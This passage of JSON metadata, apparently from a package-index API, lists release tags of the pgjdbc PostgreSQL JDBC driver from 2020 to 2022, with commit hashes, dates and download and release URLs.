/REL42.3.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1/manifests"},{"name":"REL42.3.5","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T15:41:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5/manifests"},{"name":"REL42.3.5-rc1","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T14:50:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1/manifests"},{"name":"REL42.3.4","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:48:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4/manifests"},{"name":"REL42.3.4-rc1","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1/manifests"},{"name":"REL42.3.3","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:24:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3/manifests"},{"name":"REL42.3.3-rc1","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:07:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1/manifests"},{"name":"REL42.2.25","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:20:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25/manifests"},{"name":"REL42.2.25-rc1","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:17:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1/manifests"},{"name":"REL42.3.2-rc2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"tag","published_at":"2022-02-01T14:52:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2/manifests"},{"name":"REL42.3.2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"commit","published_at":"2022-02-01T14:47:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2/manifests"},{"name":"REL42.3.2-rc1","sha":"cfc4b1106b8f4931dee8241671c3880f5f947727","kind":"tag","published_at":"2022-01-31T19:31:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1/manifests"},{"name":"REL42.3.1","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:23:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1/manifests"},{"name":"REL42.3.1-rc2","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:18:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2/manifests"},{"name":"REL42.3.1-rc1","sha":"b3050e60f81b4e43fae452bcf6df297df2048ae4","kind":"tag","published_at":"2021-10-28T16:27:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1/manifests"},{"name":"REL42.3.0","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-18T15:17:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0/manifests"},{"name":"REL42.3.0-rc2","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-15T12:59:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2/manifests"},{"name":"REL42.2.24","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:15:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24/manifests"},{"name":"REL42.2.24-rc2","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:05:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2/manifests"},{"name":"REL42.2.24-rc1","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:02:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1/manifests"},{"name":"REL42.2.23","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:41:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23/manifests"},{"name":"REL42.2.23-rc6","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6/manifests"},{"name":"REL42.2.23-rc5","sha":"624d8b88dde210447f921725682ebd58e7466bf0","kind":"tag","published_at":"2021-07-05T15:30:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5/manifests"},{"name":"REL42.2.23-rc4","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T14:55:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4/manifests"},{"name":"REL42.2.23-rc3","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:52:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3/manifests"},{"name":"REL42.2.23-rc1","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:37:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1/manifests"},{"name":"REL42.2.22-rc1","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"tag","published_at":"2021-06-16T15:08:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1/manifests"},{"name":"REL42.2.22","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"commit","published_at":"2021-06-16T14:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22/manifests"},{"name":"REL42.2.21","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:44:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21/manifests"},{"name":"REL42.2.21-rc2","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:23:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2/manifests"},{"name":"REL42.2.21-rc1","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:21:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1/manifests"},{"name":"REL42.2.20","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:23:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20/manifests"},{"name":"REL42.2.20-rc2","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:03:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2/manifests"},{"name":"REL42.2.20-rc1","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T12:37:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1/manifests"},{"name":"REL42.2.19","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T19:32:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19/manifests"},{"name":"REL42.2.19-rc2","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T18:45:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2/manifests"},{"name":"REL42.2.19-rc1","sha":"18cec592278e7f16bacdd5083017686be41d9da6","kind":"tag","published_at":"2021-02-18T15:21:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1/manifests"},{"name":"REL42.2.18","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:45:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18/manifests"},{"name":"REL42.2.18-rc1","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:12:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1/manifests"},{"name":"REL42.2.17","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T13:43:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17/manifests"},{"name":"REL42.2.17-rc1","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T12:29:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1/manifests"},{"name":"REL42.2.16","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T19:33:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16","html_url":"https://github.com/pgjdbc/pgjdbc/rel